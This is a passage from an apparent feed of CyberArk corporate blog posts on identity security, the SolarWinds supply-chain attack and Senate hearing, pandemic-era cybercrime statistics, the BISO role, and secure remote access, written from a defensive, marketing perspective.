The Result: The attacker exfiltrates millions of individuals’ personal data and can now sell it for profit in underground markets. As a result of the breach, the victim organization is forced to pay millions of dollars in regulatory fines. What’s more, the attacker also used the company’s cloud processing power to cryptojack and mine cryptocurrency.

Explore 11 Ways to Reverse the Attacker’s Cloud Advantage

Reversing the attacker advantage and protecting against cloud attacks on identity requires a proactive, identity-centric approach to security. Here are 11 foundational safeguards you can take now to get started. And if you’re looking for help along the way, The CyberArk Blueprint for Identity Security Success (or CyberArk Blueprint for short) is a vendor-agnostic framework for assessing your current strategy and strengthening security across your people, processes, and technology to drive resiliency in the cloud-first world.

Next up, we’ll explore how attackers hijack cloud credentials embedded in code.

]]>
Why the BISO May Be the Utility Player Your Org Needs Now https://www.cyberark.com/blog/why-the-biso-may-be-the-utility-player-your-org-needs-now/ Wed, 10 Mar 2021 15:20:07 +0000 https://www.cyberark.com/?p=113937 The Rise of the BISO

Back in 2012, Security Innovation wrote about what – at the time – was a relatively new C-Level role dubbed Chief Information Security Officer. In the introductory blog post, the author attempted to explain this multifaceted role by suggesting that someone in that position could approach their work in one of several ways: most tended to fall in the categories of technical-focused CISO or a policy-focused CISO.

These approaches, referred to as TISO (“Technical Information Security Officer”) and BISO (“Business Information Security Officer”) respectively in the piece, were presented less as disciplines in their own right and more just ways to define approaches to the CISO role. It was as though how one approached the job was kind of up to the individual, but at the end of the day, they had to bear the responsibility of all technical security concerns, from anticipating problems to implementing solutions to educating and aligning internal teams.

For anyone who came of age professionally in the late ‘90s and through the 2000s, what happened in the ensuing years after Security Innovation’s post should come as no surprise. Technological advancements would often start out clearly siloed and distinct before becoming gradually ingrained into every level of an organization’s business – in fact, becoming key to the company’s overall business growth.

So, the suggestion that a CISO could be a TISO or a BISO has now become: Is it time for a dedicated BISO?

Evolving to the BISO

To clearly define the BISO’s role, it’s important to know how it evolved. Going back 20 or 30 years, the first real C-Level title to grow out of the IT space was the CIO. This was an executive who had to balance technical expertise with the ability to elevate and communicate the organization’s tech needs to the CFO. Out of that role emerged the CISO, which focused on technological innovation and communication in terms of security – but usually with a similar task of convincing top-level stakeholders that investment in security was necessary to the health of their business.

A 2021 study conducted by PwC found that 50% of CISOs surveyed said they are now more likely to consider cybersecurity in every business decision, which was an increase from 25% the year before. On top of that, an overwhelming 96% said they will adjust their cybersecurity strategy due to COVID-19. And it doesn’t require a leap to make the connection between these stats and the increase in the rise and visibility of the BISO.

“The role was born out of necessity,” says CyberArk Strategy and Corporate Development Associate Lex Register. “It’s probably impossible for a leader in IT security to just bolt on business skills. A lot of organizations are seeing that you need a bridge – you need someone who can talk to both sides.”

If more CISOs were seeing the importance of making cybersecurity a part of every business decision, the security concerns raised by the increase in remote work and at-home “device hopping” due to the pandemic has only further crystallized the idea that this “bridge” role was a necessary evolution and a discipline in its own right.

“They can’t just talk tech anymore,” says Register. “They have to put into business terms why the investments they’re making on the security side are needed.”

As writer and security advocate Alyssa Miller writes, “BISOs work closely with the CISO and business leaders to make sure that corporate security objectives are treated as business requirements.” To put it another way, rather than expecting a CISO to suddenly adopt business jargon, the BISO would – ideally – have experience on both sides to be able to smoothly translate concerns, solutions, and responses in a language that speaks to both groups. 

A New Multitool Player Mashup

The SolarWinds attack at the end of 2020 was seen by many in cybersecurity. It’s the type of event that sends ripple effects through nearly every industry, causing a widespread reevaluation of what organizations are doing to increase security, which partners they’ll do business with, and what kind of people they need in place internally to help defend against attacks. It’s also, in turn, paved the way (albeit with some fairly treacherous asphalt) for more BISOs.

A search of BISO job listings these days brings up terms not often associated with any technical position, much less upper-level technical positions – things like “creative problem solving” and “influencing company culture.” This is because BISOs do more than just address security issues, they must be the tip of the spear when it comes to cultivating a security-aware culture. It’s almost equal parts tech, business, and public relations. Yes, PR – it seems the BISO could be considered a Swiss Army knife role.

As so many incidents like the SolarWinds breach have shown, cybersecurity threats still thrive most effectively on human error. A BISO has to be creative and almost think like a PR strategist (or even an HR rep) – finding engaging ways to influence leadership and build awareness that security is just as much the employees’ job as it is that of the IT department. Register describes BISOs sending out fake company-wide emails with phony phishing links in them to reinforce employee awareness – and whoever takes the bait and clicks receives a reminder to be more careful or follow-up cybersecurity training.

A BISO may also be called upon to interact with marketing and corporate communications, bringing their research into potential attack vectors, typical points of vulnerability, and unique understanding of the “attacker mindset” to the fore to guide organizations that are increasingly touting cybersecurity as a competitive advantage in the marketplace. The BISO can help shape the conversation not only to strengthen the infrastructure behind the claim internally but to ensure clear and effective information about a company’s cybersecurity efforts is also conveyed to the customer.

While the CISO is focused on getting executive support for critical security initiatives, the BISO is working in tandem to creatively educate leadership and non-technical employees about the importance of these initiatives.

Infusing Creativity into Cybersecurity Roles

Perhaps the biggest and arguably most impactful change to come out of the increased visibility of the BISO role is a rethinking of cybersecurity roles through the prism of creativity. People in IT roles are rarely afforded the time to think creatively. Allowing a BISO the time to research, network and experiment – even if the end result isn’t highly visible across an organization – will ultimately have a much more positive impact on your organization’s overall security. That’s because a BISO must anticipate new security threats. They know how attackers think, so they need to stay a few steps ahead, and this is only possible if they’re allowed that space.

“A lot of the job is managing internal and external relationships, talking with vendors, and finding out what’s the newest, greatest stuff out there,” says Register. “It’s part internal execution and part pure exploration.”

To use the insurance analogy, cybersecurity is doing its job when you don’t know it’s there. And when BISOs are doing their jobs, you don’t see them as singularly focused – they are strategic resources who can appreciate the speed it takes to innovate, without sacrificing security and raising overall organizational risk. They are in every room, in every conversation, helping every stakeholder understand that security is a top-down responsibility. The evolution has been relatively slow when you consider the speed at which other aspects of technology have grown, but it has been steady. Recent events have pushed these ideas to the forefront, and as perceptions change, roles are more clearly defined and more creativity enters the mix – the result is stronger, more agile cybersecurity.

So, yes – now is the time for a dedicated BISO.

 

 

 

 

]]>
SolarWinds Senate Hearing: Moving Forward It’s All About Zero Trust https://www.cyberark.com/blog/solarwinds-senate-hearing-moving-forward-its-all-about-zero-trust/ Wed, 03 Mar 2021 16:59:04 +0000 https://www.cyberark.com/?p=113311 SolarWinds Senate Hearing Zero Trust

We still don’t have a complete picture of what exactly happened during the SolarWinds attack in 2020, nor do we know the full extent yet of the damage or what the long-term impact may be. However, imagine how much less we would know – and how much more vulnerable the world would be – if private security firm FireEye had not come forward to report the attack after discovering its own systems had been infected.

That question was at the heart of the U.S. Senate Select Committee on Intelligence hearing held on Feb. 23. SolarWinds CEO Sudhakar Ramakrishna, FireEye CEO Kevin Mandia, Microsoft president Brad Smith, and CrowdStrike CEO and President George Kurtz were all in attendance as witnesses to discuss the novel March 2020 attack – believed by many to be the work of nation-state attackers who successfully compromised identities and manipulated privileged access to pull off a massive, targeted digital supply chain attack that potentially compromised thousands of government and private sector entities.

Through hours of testimony and questioning, two things came to the fore:

1. Today, there is no legal obligation for private organizations to report breaches to government agencies of any kind. Due to the nature of a breach involving an unauthorized entity gaining access to an organization’s most sensitive data and assets, there is no actual requirement for organizations to notify the government. There’s a need for both mandatory participation, and communication between government agencies to be streamlined.

2. Federal government agencies and departments are frequent targets for nation-state attackers. Whether the goal is to compromise sensitive government data, steal personally identifiable information (PII), or disrupt operations, the sophistication of such attacks makes it increasingly difficult to safeguard critical cyber infrastructure. These challenges are made even more difficult by the government’s lack of resources, overall visibility into threats, and standardized security processes. There’s broad consensus that a new approach to cybersecurity is needed – one grounded in Zero Trust.

Transparency is the Way Forward

Nation-state attackers are well-funded, highly organized, incredibly sophisticated, and extremely patient – and in most cases, they will find a way inside no matter how strong an organization’s defenses. During the hearing, Ramakrishna made vehemently clear during his first public acknowledgment of the incident that the principle of least privilege had been overlooked by SolarWinds, putting the crosshairs directly on their backs. Explaining why SolarWinds’ Orion platform was targeted, he said, “When you gain access to the Orion platform you gain administrative privileges to the Windows servers that the Orion platform is running on – and so if you were to run that with lower privileges, even if an attacker were to gain control, they won’t be able to do as much damage because you’re a regular user and not an administrator of that network.”

Generally speaking, implementing preventative controls that consistently enforce least privilege will help buy an organization invaluable time; frustrating the attackers to the point of forcing their hand to use methods and techniques that will expose their presence.

The sophistication of this attack was referenced a number of times. The SolarWinds attackers were extremely careful not to raise traditional red flags, which made the attack (and its reach) harder to detect and determine. They leveraged U.S.-based infrastructure, which allowed them to avoid immediate detection. Additionally, they impersonated users with specific access and avoided the use of domain admin access to further decrease the chance for detection.

The hearing brought to the surface the need for higher levels of security and cooperation across the public and private sectors and a call for encouraging greater transparency regarding cyber attack reporting. The hearing made it clear a confidential disclosure program would both protect a company’s reputation and improve cybersecurity at the federal and private levels.

A step in the right direction, just a few days before the hearing, the government announced sweeping executive action. Anne Neuberger, deputy national security advisor for cyber and emerging technology, said in a White House press briefing that the government is “working on close to about a dozen things. Likely, eight will pass to be part of an upcoming executive action to address the gaps we have identified in our review of this incident.”

Cyber Hygiene for All

SolarWinds shed light on the far-reaching impacts of supply chain attacks, and the need for a proactive approach to security. By adopting an “assume breach” mindset, government agencies and private organizations can enforce multiple layers of security – to reduce the greatest amount of risk. This approach, referred to as “Defense In-Depth,” is based on Zero Trust principles. And it comes down to three things:

1. Working to make sure your organization’s own internal infrastructure is secured, and that attention is focused on preventing attackers from reaching their end goals. This includes securing access to Tier0 systems.

2. Protecting development environments – including the CI/CD pipeline, which was the critical first phase of the SolarWinds attack. Some important proactive steps include validating the integrity of all code and builds, securing access to highly privileged pipeline orchestrators and infrastructure managers – and enforcing just-in-time access policies in these highly automated environments.

3. Focusing on bolstering the security of customer-facing products and services, with a critical eye on the security practices and stability of digital supply chain partners.

It’s clear, as part of the testimony that came out of the hearing, it’s hard to fully stop an attack of this precision and scale – but an “assume breach” mindset will enable organizations to become vigilant and hyper focused on addressing weaknesses and vulnerabilities that exist within their IT environment, especially the areas that provide access to critical systems and infrastructure (i.e. privileged access).

Zero Trust” and “least privilege” may still seem like buzzwords to some, but in the wake of this hearing they will continue to be the impetus behind a push for stronger security protocols, more transparent communication between private organizations and the federal government – and, ideally, more effective ways to mitigate the risks of large-scale attacks.

]]>
Why You Need Identity Security https://www.cyberark.com/blog/what-is-identity-security/ Mon, 01 Mar 2021 22:46:01 +0000 https://www.cyberark.com/?p=113215 What is Identity Security

As consumers, we’ve come to expect our digital experiences to be easy, fast, intuitive and highly personalized. To meet these increasing demands and gain competitive advantage, companies have doubled down on cloud-based technologies and services in recent years. This unstoppable inertia accelerated tenfold in 2020, when virtually every aspect of our lives changed, from the ways we work and learn, to the ways we buy products and services, to the way we interact with one another.

Now, to quote a recent Accenture report, “an experience renaissance is afoot,” and as organizations focus more than ever on delivering exceptional end-user experiences, digital transformation has taken hold. This rapid innovation – coupled with the technical intricacies of supporting distributed workforces – has caused the number, types and interconnectedness of identities to multiply across business applications and cloud workloads, dissolving physical and network security barriers that once clearly delineated the “good guys” from the bad ones.

All Roads Lead to Identity

While several years ago only small groups of users (mostly IT admins) were considered privileged, in today’s environment, any identity – whether customer, remote worker, third-party vendor, device or application – can become privileged under certain conditions, creating an attack path to an organization’s most valuable assets.

Just a few examples of these new dimensions to the threat landscape include the extreme danger posed by cloud console access, excessive cloud entitlements and embedded DevOps and applications secrets. Attackers fully recognize the opportunity: an IDSA study found 79% of enterprises have experienced an identity-related breach within the last two years. And like so many others, the recent SolarWinds digital supply chain attack involved the compromise of identity and manipulation of privileged access.

In the face of these modern threats, it’s clear that identity has become the new security battleground and that an “assume breach” mentality, based on the principles of Zero Trust, is absolutely critical. But while cyber attacks are inevitable, negative business impact is not.

Identity Security to Move Fearlessly Forward

Today, we introduced new Identity Security offerings that complement the CyberArk Identity Security portfolio and demonstrate continued innovations that deliver on our vision.

While we’re excited about this powerful new suite of subscriptions, programs and tools, we thought it’d be helpful to take a step back and explain exactly what we mean by “Identity Security.”

The CyberArk Identity Security approach is centered on privileged access management and focuses on securing individual identities – human or machine – throughout the cycle of accessing critical assets.

This means authenticating that identity accurately, authorizing that identity with the proper permissions and providing access for that identity to privileged assets in a structured manner – all in a way that can be audited (or accounted for) to ensure the entire process is sound. With CyberArk Identity Security, organizations can secure access across any device, anywhere, at just the right time – so they don’t have to choose between security and productivity.

Now, you might be asking, “How is that different than Zero Trust?”

Zero Trust is not a solution or technology but rather an approach to security based on the principle of “never trust, always verify.” This approach ensures every user’s identity is verified, their devices are validated, and their access is intelligently limited to just what they need – and taken away when they don’t. As the embodiment of this model, Identity Security offers a set of technologies that are foundational to achieving Zero Trust.

The most complete and flexible set of Identity Security capabilities

At CyberArk, security is in our DNA, and as the pioneer and leader of the Privileged Access Management market, we are uniquely positioned to address the fast-changing nature of privilege and help organizations embrace a risk-based strategy for defending against identity-based attacks.

Our AI-powered approach eliminates friction and risky habits that stem from repetitively requesting re-authentication every time a user attempts to access a system – balancing the requirements of strong security with the desire to provide an excellent end user experience. We do this by using real-time intelligence and analytics to separate the good from the bad and grant only what’s needed, just in time. Potential threats are contained, neutralized and remediated before they do harm.

Beyond strong identity assurance, we infuse organizations with the confidence and agility they need to accelerate transformation initiatives, so they can deliver exceptional experiences that drive customer loyalty and measurable business impact.

A Roadmap for Identity Security Success

Identity Security offers organizations the peace of mind that their most critical assets are protected. But getting started can be half the battle.

Founded on best practices gained through years of hands-on customer engagements and cutting-edge research from the CyberArk Labs team, the CyberArk Blueprint is a best practice framework for Identity Security success. Whether you’re focused on securing access to on-premises infrastructure, agile software development methods or new digital transformation projects right now, tap into the Blueprint as you chart your course.

]]>
Pandemic Cyber Crime, By the Numbers https://www.cyberark.com/blog/pandemic-cyber-crime-by-the-numbers/ Fri, 26 Feb 2021 13:30:13 +0000 https://www.cyberark.com/?p=113076 Cybersecurity Stats

Almost a year ago, the world turned upside down and seemingly everything changed due to the COVID-19 pandemic. In that time, entire workforces went – and stayed – home, cloud adoption skyrocketed and digital transformation has become a business imperative at scale. This confluence of events has also spelled “opportunity” for attackers – a fact that is widely reflected in cyber crime data.

As we approach the one-year mark, here’s a look back at some of the most eye-opening industry cybersecurity statistics from this period of unprecedented change.

An Attack Explosion

In the six weeks following lockdown, the World Health Organization (WHO) cautioned that scammers were preying on pandemic fear and uncertainty by impersonating the WHO, in addition to targeting WHO systems and employees directly, at a rate five times greater than in the same period in 2019.

While attackers mostly stuck to their favorite tried-and-true tactics to launch their attacks – phishing and identity compromise – the sheer volume of attacks was truly staggering, and caught many people distracted, unaware and unprepared. TechRepublic reported a 667% rise in spear-phishing attacks in March 2020 alone, and by April, the FBI had seen a 400% increase in cyber attacks.

Ransomware attacks also surged by 800% amid the rapidly evolving global crisis, prompting INTERPOL to issue a warning to healthcare institutions on the front lines about the growing threat. And Microsoft researchers warned of criminal groups using popular strains like Robbinhood, Maze and REvil to carry out “long-tail” attacks, waiting weeks or even months to deploy the ransomware, decrypt massive swaths of high-value data and demand crippling, multi-million dollar ransoms.

Meanwhile, as organizations accelerated cloud adoption to meet customer needs and support distributed workforces, a 630% increase in cloud-based attacks was recorded between January and April, mostly targeting services like Microsoft 365, and mostly involving the use of stolen credentials.

And the attacks kept coming: 70% of organizations hosting data or workloads in the public cloud experienced a security incident within the last year, with multi-cloud organizations reporting up to twice as many incidents’ versus single platform adopters.

Ponemon Institute estimated that new risks and challenges related to remote work would tack an additional $137K onto the 2020 global average total cost of a data breach, for a grand total of roughly $4M per incident.

Breaking that down, healthcare has the highest industry average cost at $7.13M per breach, and the United States has the highest country average cost at $8.64M.

Personally Identifiable Information (PII) has the highest cost per record at $150 each. Meanwhile, according to Deloitte, basic PII such as name and credit card information can be sold on the dark web in bulk for $0.10 or less.

Cracks in the Digital Armor

No one was prepared for the drastic shift foist upon the world by the global pandemic. In an instant, organizations had to scramble to connect home offices, support new devices and bring new collaboration tools online as quickly as possible. Too often, security became an afterthought. At the same time, remote workers were trying to figure out how to do their jobs from the confines of their homes. It wasn’t long until security workarounds in the name of productivity became dangerous, persistent habits.

According to Malwarebytes, 20% of companies said they faced a security breach specifically as a result of a remote worker, and 24% spent unbudgeted dollars on cybersecurity breaches or malware attacks after the world went into quarantine.

So where is it all falling apart? As it turns out – pretty much everywhere. Let’s examine one of many “cracks” in the digital armor.

Device Cross-Pollination

The Q4 2020 CyberArk State of Remote Work Survey found that 69% of remote workers use corporate devices for personal use. Even worse, 57% admitted to letting other members of their household use their work devices for non-work activities like shopping, gaming, or schoolwork. This risky device-sharing activity almost doubled since CyberArk conducted a similar survey in spring 2020.

It’s estimated that one in 36 mobile devices have high-risk applications installed. When employees mix work and leisure on their device, these vulnerabilities provide potential openings for attackers to steal credentials and gain a foothold into an organization. And attackers are targeting these web-based applications in earnest: the 2020 Verizon Data Breach Investigation report highlights a year-over-year two-fold increase in web application breaches to 43%. Stolen credentials were used in over 80% of these cases.

In short, the more employees use personal devices for work purposes (or use work devices for personal activities), the more organizational risk they create. And it’s happening. A lot.

But even if remote workers adhere to security best practices and follow corporate protocols by the book, spotting a spoof within a pile of legitimate work emails is hard to do. CSO reports that 94% of malware is delivered via email, and it’s often cleverly disguised.

So, What Can We Do?

There is a cyber attack every 39 seconds. Cyber crime damages are projected to total $6 trillion annually by 2021, while global ransomware damages are expected to total $20 billion this year.

Yet despite rising awareness, the average time to identify a breach in 2020 was still a whopping 207 days, according to the Ponemon Institute. Then it was another 280 days, on average, between identification and containment – more than enough time for an attacker to cause disruption or damage.

Murphy’s law states that anything that can go wrong, will go wrong. That’s why it’s so important to assume you’ve already been breached and focus on breaking the attack chain. This means identifying, isolating and stopping attackers from compromising identities and gaining privilege, before they can do harm.

In the digital realm of good vs. evil, much more needs to be done, yet there are not enough cybersecurity professionals to do it. Cybersecurity Ventures estimates there will be 3.5 million unfilled cybersecurity jobs by 2021. Globally, the workforce would need to grow by 145% to meet rising demand and eliminate the cybersecurity labor shortage.

This  shortage  is only getting worse, according to a recent study by ESG and the Information Systems Security Association. The study shows that 70% of cybersecurity professionals say their organization had felt the impact of the skills shortage through symptoms such as growing workloads, unfilled job openings and the inability for professionals to learn or use  cybersecurity technologies to their full potential.. Moreover, 18% of cybersecurity professionals from this study have  been in the field for three years or less, and most started as IT professionals.

ESG concludes that  a holistic approach can begin to close this gap – calling for ongoing cybersecurity education that begins at the public school level as well as career mapping, planning and development for both new and established professionals as cyber threats continue to evolve.

That won’t happen overnight, much as the world may need it to.

Since there is no caped crusader ready to swoop in and save the day, organizations must learn to think like an attacker and treat their systems as though they’ve already been breached, rather than assuming (or hoping) that they will be spared. That doesn’t have to be as grim as it sounds: A mindset shift and proactive stance are critical first steps toward a stronger security posture.

]]>
The Anatomy of the SolarWinds Attack Chain https://www.cyberark.com/blog/the-anatomy-of-the-solarwinds-attack-chain/ Tue, 23 Feb 2021 14:03:07 +0000 https://www.cyberark.com/?p=112803 The Privilege Pathway

Imagine there’s an attacker lurking inside your network right now. Do you have the ability to find out and respond before they can cause harm? Now imagine your adversary has privileged access to virtually every file and system in your IT environment and can impersonate any human, application or machine identity, at any time. Could you spot the attacker hiding in plain sight?

These are just some of the many questions security teams are asking themselves in the wake of the massive SolarWinds attack that leveraged a digital supply chain vector to potentially reach into more than 18,000 organizations around the world.

While details of the attack and its implications continue to surface, it’s clear that the compromise of identity and manipulation of privileged access was instrumental in the success of this attack. And today, there’s much to be learned from examining the tactics, techniques and procedures (TTPs) used by the adversary to achieve what The Washington Post described as “the computer network equivalent of sneaking into the State Department and printing perfectly forged U.S. passports.”

We asked Lavi Lazarovitz, head of CyberArk Labs, to help us deconstruct the attack so organizations can better understand what they’re up against and prioritize efforts to reduce the most risk. For a deeper technical dive and guidance on risk mitigation, join our webinar on March 18 and save the date for a big-picture view of what major breaches like ‘Solorigate’ mean for both defenders and attackers on April 22 (U.S. registration, EMEA registration and APJ coming soon!).

Deconstructing the Three Major Stages of the SolarWinds Attack

Where It All Began

In early December 2020, several organizations discovered and reported breaches to their networks within a few days of each other. It didn’t take long for security and threat analysts to connect the dots, as the initial foothold into each of these companies was identical: a Trojanized update to a popular infrastructure monitoring and management platform – SolarWinds’ Orion. Soon, many other organizations and government agencies discovered similar infections.

But why Orion? “Because it’s connected everywhere – from switches and routers, to firewalls, virtualization infrastructure, Active Directory, storage management tools and more,” explains Lazarovitz. “All of these connections rely on credentials, which in most cases are highly privileged. Simply put, Orion has its ‘hooks’ in all facets of an enterprise, making it the perfect target for an adversary.”

Attack Stage 1: Infect the Orion Software Pipeline Infection

While it’s still unclear exactly how the adversaries first infected SolarWinds Orion, forensic evidence reported in the press indicates they worked hard to learn the company’s code structure and terminology before launching the attack. But how they managed to gain entry is inconsequential, since threat actors, especially well-resourced nation-state actors, will nearly always find a way to get inside. It’s also why defenders must always “assume breach.”

To establish a foothold into the organization, the threat actor compromised the “heart” of the CI/CD pipeline, where code is tested, wrapped, containerized and signed, then successfully changed SolarWinds’ source code. The attacker deployed malware, now infamously known as “SunSpot,” which ran with high privileges, scanning for Orion builds.

With surgical precision – and without tipping off developers or engineers – the malware changed source file code names (ever so slightly) to deploy a backdoor. Following the build update, the backdoor code was deleted and the original file names were restored.

Lazarovitz emphasizes the complexity of such an operation, noting, “The actor had to silence warnings in the code and make sure the deployment of the malicious code was flawless.” Making it seem as though they’d never been there was no easy task.

These revelations have prompted many organizations to re-examine the security of their own CI/CD pipelines, and particularly, pipeline orchestrators and infrastructure managers, since these assets have extensive privileged access. These organizations are asking their supply chain vendors to do the same.

Attack Stage 2: Target SolarWinds Customers

After a dormant period of about two weeks – an intentional pause that helped the attacker cover their tracks – the malicious payload started doing some reconnaissance and operation security checks.

One of these checks aimed to identify hashes linked to specific endpoint security agents and forensics tools that could expose the running malware. If an agent or tool on this “checklist” was identified in the environment, the malware attempted to terminate the agents or suspend itself, if unsuccessful.

However, if the malware did not find these specific hashes, or if it successfully terminated them, it moved to the next stage: calling home, dispatching commands from C&C servers and disabling any vulnerable endpoint security agents.

“Generally speaking,” Lazarovitz explains, “the level of privilege the malware has upon initial infection can spell the difference between an infected endpoint and an entire network takeover.” Enforcing the principle of least privilege across all endpoints can help prevent lateral movement, making it significantly harder for attackers to accomplish their goals. But in the case of this digital supply chain attack, the malware already had elevated privileges when it reached each Orion customer organization.

Note, with the benefit of 20/20 hindsight, credential theft protection policies protecting Orion’s credentials database may have slowed the attack down by requiring the actor to use tools and techniques that increase the chance of exposure.

But as it was, “Orion’s privileged credentials were accessible to the attacker once inside, and almost certainly used in the next stage of the attack,” says Lazarovitz.

Attack Stage 3: Privilege Escalation to High-Value Targets

Based on what’s been reported, the actor most likely harvested credentials stored in Orion’s database, such as those traditional Tier0 assets like Active Directory, firewalls and infrastructure and networking management software. This would enable rapid escalation of privileges. And with these powerful credentials in hand, the threat actor could have owned the targeted network right away.

“But here’s where it got interesting,” says Lazarovitz. The attacker began making moves to establish persistence, possessing sufficient privileges to not only add a backdoor account, but also an entire trusted tenant completely under their control. This provided continued access to the target network’s applications, services and data using the new trusted tenant accounts. Further, it eliminated the impact of any potential password changes by the organization and allowed the attacker to bypass multi-factor authentication completely.

Doing this required a mix of sophisticated methods, and most notably, the Golden SAML technique.

Using highly privileged credentials, the attacker successfully accessed and manipulated the victim organization’s SAML token-signing certificate and forged digital SAML tokens that provide single sign-on access to virtually any system and application in the environment, both on-premises and in the cloud. Since SAML token-signing certificates are almost never changed, the attacker could persist in the network for lengthy periods of time without fear of detection, and ultimately, achieve the intended goal.

“The Golden SAML technique highlights the fact that if the primary secret of the identity provider is compromised – for example, Active Directory Federation Services, then the threat actor ‘owns’ the source of truth and BECOMES their own identity provider. They can impersonate any user they want – no matter the user’s password, no matter the level of privilege and no matter if MFA is implemented,” says Lazarovitz. He stresses the importance of implementing strong Identity Security policies and controls that restrict privileged access to these Tier0 systems, reduce exposure and enable earlier detection.

To learn more about the Golden SAML technique, which was first identified by CyberArk Labs in 2017, visit the CyberArk Threat Research Blog.

The Right Frame of Mind: An Assume Breach Mentality

The vast majority of all cyber attacks involve the compromise of identity and manipulation of privileged access. The SolarWinds breach was no exception.

As traditional network security barriers dissolve, the ‘assume breach’ mindset has never been more critical. By assuming that any identity – whether human or machine – in your network may have been compromised, you can turn your attention to identifying, isolating and stopping threats and gaining privileged access and executing lateral movement, before they can do harm.

 

]]>
Three Best Practices to Get Privileged Remote Access Right for the New Normal Workforce https://www.cyberark.com/blog/three-best-practices-to-get-privileged-remote-access-right-for-the-new-normal-workforce/ Wed, 17 Feb 2021 14:05:43 +0000 https://www.cyberark.com/?p=112740 Three best practices

While I haven’t seen many of my co-workers in person in almost a year, we’ve found new, collaborative ways to tackle projects – and along the way, we’ve managed to forge even closer connections. We’ve come up with exciting new ideas in virtual meetings, live-chatted through successful product sprints, and even streamed virtual cooking classes together. Thanks to digital technology, the “watercooler” may be gone, but the culture and camaraderie aren’t.

After settling into the new normal, many employees around the world seem to agree that there is some upside to an otherwise once unimaginable situation. They feel connected and productive at home and want to keep working there long-term. Yet, while many businesses want to enable their employees with flexible models, a major ongoing challenge is securing their distributed workforces, particularly for those requiring privileged access.

In 2020, VPN usage skyrocketed to 277 million downloads worldwide as IT teams worked to bring, and keep, remote workers online. But after months of working from home, 78% of employees said challenges in connecting to corporate systems was their No. 1 gripe with the new working norm. And considering the number of recent breaches linked to remote access systems, it’s clear that providing secure and simple access for remote employees is far from a perfect science.

Every remote worker, third-party vendor, or contractor requiring access to your sensitive company systems needs a way to get inside. The question is, how do you keep the bad guys from doing the same?

Here are best practices your organization can take today to not only bolster remote privileged access security controls but also minimize headaches for your remote employees and trusted third parties:

1. Start with strong authentication. This may seem obvious at this point, but it bears repeating that the ability to authenticate each individual identity – whether a remote worker or vendor – with high accuracy is table stakes for any cybersecurity program today. And for individuals requiring privileged access, it is mission-critical to enforce multi-factor authentication (MFA) any time they require access to sensitive internal resources. With no shortage of MFA options out there (keys, tokens, push notifications, texts, and biometrics, to name a few), what’s less obvious is finding a method that’s both secure and minimally bothersome for the end-user. Productivity and overall morale hinge on that decision – so choose wisely.

2. Re-visit your VPN use. VPNs, if not properly implemented and maintained, can be exploited by attackers to gain privileged access to sensitive systems and data. Attackers know they can skip time-consuming steps in their attack chain (like stealing non-privileged credentials and moving laterally and vertically to escalate privileges) by starting with targeting privileged users connecting from home via VPN. Insecure or misconfigured home routers also introduce risk in the VPN equation – and give attackers an easy “in” to corporate systems. What’s more, home routers often establish a permanent VPN connection, meaning anyone on the home network could access company resources. The 57% of remote workers who admit to allowing household members to use their corporate devices for schoolwork, gaming, and shopping are making attackers’ jobs even easier.

While I’m focusing here on corporate IT infrastructure, it’s also important to acknowledge attacks on operational technology (OT) are on the rise. Recent headlines show how dangerous it can be if attackers gain remote access to critical infrastructure and manipulate systems that power and supply the planet. VPNs are insufficient for these environments and should not be used to provide secure remote access to privileged users, such as operators and engineers. Instead, rigorous security controls must be implemented to secure identities throughout their lifecycle, access should only be brokered via secure gateways connecting directly to critical targets and every privileged session must be monitored and recorded to reduce risk.

3. Don’t mess with people’s workflows. To quote Salesforce CEO Marc Benioff, “Speed is the new currency of business.” And privileged users – from IT admins to cloud security architects – have a lot to do, and need to do it fast. They need to be able to log into their workstations and access systems and applications with minimal disruption. But in distributed work environments, these privileged users often require multiple RDP connections each day – and manually establishing connections over and over is a major pain and slows things down. Remote desktop connection managers can help centralize that process and make life easy on end-users, but they can also create blind spots for security teams. To maintain visibility and minimize risk, make sure that each time a remote connection manager is used to launch a session, the session is isolated, monitored, and recorded. This is really the best of both worlds: it removes end-user friction while giving security teams the information needed to maintain a full audit trail.

Also, consider ways to help your admins, so they can help everyone else. In the remote work world, working nine-to-five has stretched substantially, and admins are feeling the pressure to grant access quickly and smoothly to a disparate, “always-on” workforce. Solutions with push notifications and the ability for admins to get direct requests on their smartphones help fast-track end-user demands while giving admins more flexibility.

Finding the right balance between security and business agility takes time and adjustments along the way. Join our on-demand webinar to dig deeper into these recommendations and explore new features to help you take remote access enablement to the next level. You’ll see how CyberArk Remote Access (formerly Alero) can help your digital business prosper – from the office to the kitchen table, on the road, and everywhere in-between.

]]>
Beyond Buy-In: True Change Is Only Achieved Through Accountability https://www.cyberark.com/blog/beyond-buy-in-true-change-is-only-achieved-through-accountability/ Fri, 12 Feb 2021 14:00:57 +0000 https://www.cyberark.com/?p=112635 Change management

If there is one concept that has dominated the tech world over the past few years, it’s … disruption. It seems the entire industry has been driven by a mission to shake up everything indiscriminately and render anything more than a few years old obsolete. And this has led to a lot of good and even more dramatic change. But it’s also led to a lot of uncertainty – some of which has to do with the word disruption itself.

The idea of tech disruption really started with Harvard Business School Professor Clayton Christensen and his 1997 book The Innovator’s Dilemma. However, what Christensen was really describing wasn’t so much disruption as it was replacement or displacement – smaller companies using technology to usurp the dominant powers of old industry titans. Yet the idea of “disruption” took hold, fueling a general wariness about any new technological process or protocol. Organizations began struggling with people who saw these “new ways” as adding more hurdles to their everyday routine – making it harder for them to do their jobs. Besides, isn’t security someone else’s responsibility anyway?

In our first conversation with banking risk and IT security leader, Gerry Owens, now CEO of GOTAB IT RISK inc., we explored how truly effective change must be driven from the top. But from there, how do you implement acceptance and accountability across all levels of the business? We continued our discussion to find out. 

Gerry Owens on Transformation

Transformation, Not Disruption

Owens has firsthand knowledge of the challenges facing the implementation of technological change in highly regulated industries. For him, there’s only one way for operational change to take hold, grow and thrive – and it’s not through “buy-in.” It’s through actual understanding. It is holistic transformation vs. outright disruption or displacement, as it were.

When it comes to cybersecurity implementations, everyone needs to be seen as a stakeholder and communicated accordingly. “You have to have a transparent conversation,” Owens says. “You have to say, ‘Number one, we are vulnerable, and we’re exposed. Number two, you are responsible for that exposure as much as anybody in this organization’.” For example, when communicating with development teams, he likens applications with hardcoded privileged credentials to “hiding your keys under the doormat.” This type of conversation helps change the developers’ perspective as they gain a new appreciation for how this practice exposes the firm.

